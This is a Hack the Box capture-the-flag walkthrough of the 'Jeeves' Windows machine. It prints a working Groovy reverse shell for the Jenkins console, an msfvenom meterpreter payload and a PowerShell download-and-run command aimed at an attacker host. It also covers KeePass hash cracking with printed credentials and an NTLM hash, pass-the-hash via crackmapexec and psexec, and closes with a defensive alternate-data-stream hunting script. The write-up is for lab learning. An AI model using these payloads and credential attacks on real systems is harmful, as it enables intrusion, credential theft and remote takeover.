Hack the Box – Jeeves Walkthrough

Today, we’re going to solve another CTF machine, “Jeeves”. It is now a retired box and is accessible to VIP members.
Specifications
- Target OS: Windows
- IP Address: 10.10.10.63
- Difficulty: Medium
Contents
- Getting user
- Getting root
Enumeration
As always, the first step is the reconnaissance phase, starting with port scanning.
Ports Scanning
During this step we’re gonna fingerprint the target to see what is running behind the IP address.
nmap -p 1-65535 -T4 -A -v 10.10.10.63
Enumerating Port 80
Nmap reveals IIS httpd 10.0 running on port 80 with a search page showing “Ask Jeeves”.
If you check the page source there’s an error.html page which just contains a jeeves.PNG image.
This image reveals some information which might help us in exploiting or doing privesc on the box.
Enumerating Port 50000
Nmap reveals a Jetty service running on port 50000, and if we browse to 10.10.10.63:50000
Let’s run dirbuster to see if there’s anything hidden.
We found /askjeeves, so let’s take a look at it.
Exploitation
If we google Jenkins exploits we find that the Jenkins-CI Groovy script console can be used to execute OS commands via Java.
Reverse Shell: https://alionder.net/jenkins-script-console-code-exec-reverse-shell-java-deserialization
Manage Jenkins > Script Console
Reverse Shell
String host="10.10.14.27";
int port=1337;
String cmd="cmd.exe";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();
Socket s=new Socket(host,port);
InputStream pi=p.getInputStream(),pe=p.getErrorStream(),si=s.getInputStream();
OutputStream po=p.getOutputStream(),so=s.getOutputStream();
while(!s.isClosed()){
    while(pi.available()>0)so.write(pi.read());
    while(pe.available()>0)so.write(pe.read());
    while(si.available()>0)po.write(si.read());
    so.flush();po.flush();
    Thread.sleep(50);
    try{p.exitValue();break;}catch(Exception e){}
};
p.destroy();s.close();
Click Run and start the listener.
Since we got a low-privilege shell, let’s try upgrading it to meterpreter.
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.27 LPORT=1338 -f exe > shell.exe
We use PowerShell to transfer our generated shell.exe file to the targeted machine.
powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.27:8000/shell.exe', 'shell.exe')"
After running the PowerShell command and executing shell.exe we get a meterpreter session.
We can find user.txt under C:\Users\kohsuke\Desktop.
Privilege Escalation
Method 1
We start by gathering basic information about our targeted system, so let’s check systeminfo first.
Copy all this information into a local file named systeminfo.txt. Now we’re gonna run Windows Exploit Suggester.
python windows-exploit-suggester.py --update
python windows-exploit-suggester.py --database 2019-08-01-mssb.xls --systeminfo systeminfo.txt
The machine is vulnerable to MS16-075 (RottenPotato).
Abusing Token Privileges For Windows Local Privilege Escalation
• https://github.com/foxglovesec/RottenPotato
• https://foxglovesecurity.com/2017/08/25/abusing-token-privileges-for-windows-local-privilege-escalation
Currently there are no impersonation tokens available, so let’s run RottenPotato.exe again.
There you go!
impersonate_token "NT AUTHORITY\\SYSTEM"
And we’re NT AUTHORITY\SYSTEM.
Method 2
There’s a file CEH.kdbx under C:\Users\kohsuke\Documents.
After downloading the file we had to check its file type.
This reveals a KeePass password database file type.
Open KeePass file.
keepassx CEH.kdbx
This file is protected with a password but we know how to get it 🙂
There’s a pre-installed program in Kali named keepass2john.
keepass2john CEH.kdbx > key
CEH:$keepass$*2*6000*0*1af405cc00f979ddb9bb387c4594fcea2fd01a6a0757c000e1873f3c71941d3d*3869fe357ff2d7db1555cc668d1d606b1dfaf02b9dba2621cbe9ecb63c7a4091*393c97beafd8a820db9142a6a94f03f6*b73766b61e656351c3aca0282f1617511031f0156089b6c5647de4671972fcff*cb409dbc0fa660fcffa4f1cc89f728b68254db431a21ec33298b612fe647db48
Let’s crack the hash.
Cracking Hash Using John
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt key
Password: moonshine1
Let’s open our keepass file.
There’s a bunch of data to note; upon checking each entry we found “Backup Stuff” revealing critical information.
Here’s the remaining content of the KeePass file.
Passwords:
- 12345
- F7WhTrSFDKB6sxHU1cUn
- pwndyouall!
- lCEUnYPjNfIuPZSzOySA
- S1TjAtJHKsugh9oC4VZl
- aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
But we found something interesting inside Backup Stuff.
NTLM Hash: aad3b435b51404eeaad3b435b51404ee:e0fb1fb85756c24235ff238cbe81fe00
The SMB service is running on the target machine, so we can attempt to authenticate to the system using a password spray attack or a pass-the-hash attack.
crackmapexec smb 10.10.10.63 -u Administrator -p passwords.txt --lusers
crackmapexec smb 10.10.10.63 -u Administrator -H hash.txt --lusers
Metasploit PSEXEC Module
Module: exploit/windows/smb/psexec
Now let’s run it!
And we’re NT AUTHORITY\SYSTEM.
Now let’s look for the flag.
dir /a shows all hidden files on the system, and dir /R shows alternate data streams.
The entry hm.txt:root.txt:$DATA means that root.txt is stored in an alternate data stream of hm.txt.
To read root.txt:
more < hm.txt:root.txt:$DATA
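As an added example that is not part of the original walkthrough, here is the defender’s side of the same trick: a PowerShell hunt that lists every file under a directory carrying a non-default NTFS stream (the way hm.txt carries root.txt) and dumps the stream contents. The starting directory in $Root is an assumption.

```powershell
# Added example (not from the walkthrough): hunt for files that carry NTFS alternate
# data streams, the way hm.txt hides root.txt. $Root is an assumed starting directory.
function Find-AlternateDataStreams {
    param([Parameter(Mandatory)][string]$Path)

    Get-ChildItem -LiteralPath $Path -File -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            # -Stream * enumerates every stream on the file; ':$DATA' is the ordinary
            # file content, so anything else is an alternate stream worth a look.
            Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue |
                Where-Object { $_.Stream -ne ':$DATA' } |
                Select-Object @{ n = 'File'; e = { $_.FileName } }, Stream, Length
        }
}

$Root  = 'C:\Users\Administrator\Desktop'   # assumed; widen to C:\Users for a full sweep
$found = Find-AlternateDataStreams -Path $Root
$found | Format-Table -AutoSize

# Read each stream directly, the PowerShell equivalent of "more < hm.txt:root.txt:$DATA".
# Zone.Identifier is the Mark-of-the-Web stream on downloaded files, so skip that one.
foreach ($s in $found | Where-Object { $_.Stream -ne 'Zone.Identifier' }) {
    "--- $($s.File):$($s.Stream) ---"
    Get-Content -LiteralPath $s.File -Stream $s.Stream
}
```

Zone.Identifier streams on downloaded files are expected; an unexplained named stream on an ordinary text file like hm.txt is the finding to investigate.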